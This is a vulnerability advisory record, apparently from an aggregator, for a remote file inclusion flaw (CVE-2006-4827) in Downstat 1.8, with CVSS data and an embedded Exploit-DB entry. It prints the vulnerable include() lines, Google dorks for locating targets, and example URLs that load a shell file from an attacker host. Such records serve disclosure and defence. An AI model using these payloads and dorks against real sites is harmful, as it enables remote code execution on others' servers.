ID OSVDB:28780
Type osvdb
Reporter OSVDB
Modified 2006-09-13T09:18:59
Description
Manual Testing Notes
http://[target]/downstat1.8/chart.php?art=http://[attacker]/shell.txt?
References:
Secunia Advisory ID:21914
Generic Exploit URL: http://milw0rm.com/exploits/2359
FrSIRT Advisory: ADV-2006-3594
CVE-2006-4827
Bugtraq ID: 20007
{"type": "osvdb", "published": "2006-09-13T09:18:59", "href": "https://vulners.com/osvdb/OSVDB:28780", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 5.1}, "viewCount": 1, "edition": 1, "reporter": "OSVDB", "title": "Downstat chart.php art Variable Remote File Inclusion", "affectedSoftware": [], "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2017-04-28T13:20:25", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4827"]}, {"type": "exploitdb", "idList": ["EDB-ID:2359"]}], "modified": "2017-04-28T13:20:25", "rev": 2}, "vulnersScore": 6.6}, "references": [], "id": "OSVDB:28780", "lastseen": "2017-04-28T13:20:25", "cvelist": ["CVE-2006-4827"], "modified": "2006-09-13T09:18:59", "description": "## Manual Testing Notes\nhttp://[target]/downstat1.8/chart.php?art=http://[attacker]/shell.txt?\n## References:\n[Secunia Advisory ID:21914](https://secuniaresearch.flexerasoftware.com/advisories/21914/)\nGeneric Exploit URL: http://milw0rm.com/exploits/2359\nFrSIRT Advisory: ADV-2006-3594\n[CVE-2006-4827](https://vulners.com/cve/CVE-2006-4827)\nBugtraq ID: 20007\n", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:27:24", "description": "Multiple PHP remote file inclusion vulnerabilities in Vmist Downstat 1.8 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the art parameter to (1) admin.php, (2) chart.php, (3) modes.php, or (4) stats.php.\nSuccessful exploitation requires that \"register_globals\" is enabled.", "edition": 6, "cvss3": {}, "published": "2006-09-15T22:07:00", "title": "CVE-2006-4827", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4827"], "modified": "2017-10-19T01:29:00", "cpe": ["cpe:/a:vmist:downstat:1.3", "cpe:/a:vmist:downstat:1.2", "cpe:/a:vmist:downstat:1.7", "cpe:/a:vmist:downstat:1.6", "cpe:/a:vmist:downstat:1.5", "cpe:/a:vmist:downstat:1.4", "cpe:/a:vmist:downstat:1.8"], "id": "CVE-2006-4827", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4827", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmist:downstat:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmist:downstat:1.8:*:*:*:*:*:*:*", "cpe:2.3:a:vmist:downstat:1.7:*:*:*:*:*:*:*", "cpe:2.3:a:vmist:downstat:1.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmist:downstat:1.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmist:downstat:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmist:downstat:1.5:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T16:05:21", "description": "Downstat <= 1.8 (art) Remote File Include Vulnerability. CVE-2006-4827. Webapps exploit for php platform", "published": "2006-09-13T00:00:00", "type": "exploitdb", "title": "Downstat <= 1.8 art Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4827"], "modified": "2006-09-13T00:00:00", "id": "EDB-ID:2359", "href": "https://www.exploit-db.com/exploits/2359/", "sourceData": "DESCRIPTION: Remote file include vuln found by sZ [sept, 8 2006.]\nSOFTWARE: downstat 1.8\nVENDOR URL: http://vmist.net/index.php?script=Downstat\nDORKs:\n\"Login To Downstat 1.8\"\nallinurl:\"/downstat/\"\n \n\nNOTES: greetz to: neo-vortex, sk0tie, icez. visit @ irc.bluehell.org #silenz\n \n\nVULN CODE:\n------\nadmin.php:\n \nif(!@include($art.\"in_php.php\")) exit(\"upload \".$art.\"in_php.php\");\n \n------\nchart.php:\n \nif(!@include($art.\"downstat_art/in_html.php\")){ exit(\"upload \".$art.\"in_html.php\"); }\n------\nmodes.php\n \nif(!@include($art.\"downstat_art/in_html.php\")){ exit(\"upload \".$art.\"in_html.php\"); } \n-----\nstats.php\n \nif(!@include($art.\"downstat_art/in_html.php\")){ exit(\"upload \".$art.\"in_html.php\"); }\n----\n \n\nEXAMPLE:\nhttp://site.com/downstat1.8/chart.php?art=http://silenz.be/shell.txt?\n\n# milw0rm.com [2006-09-13]\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2359/"}]}
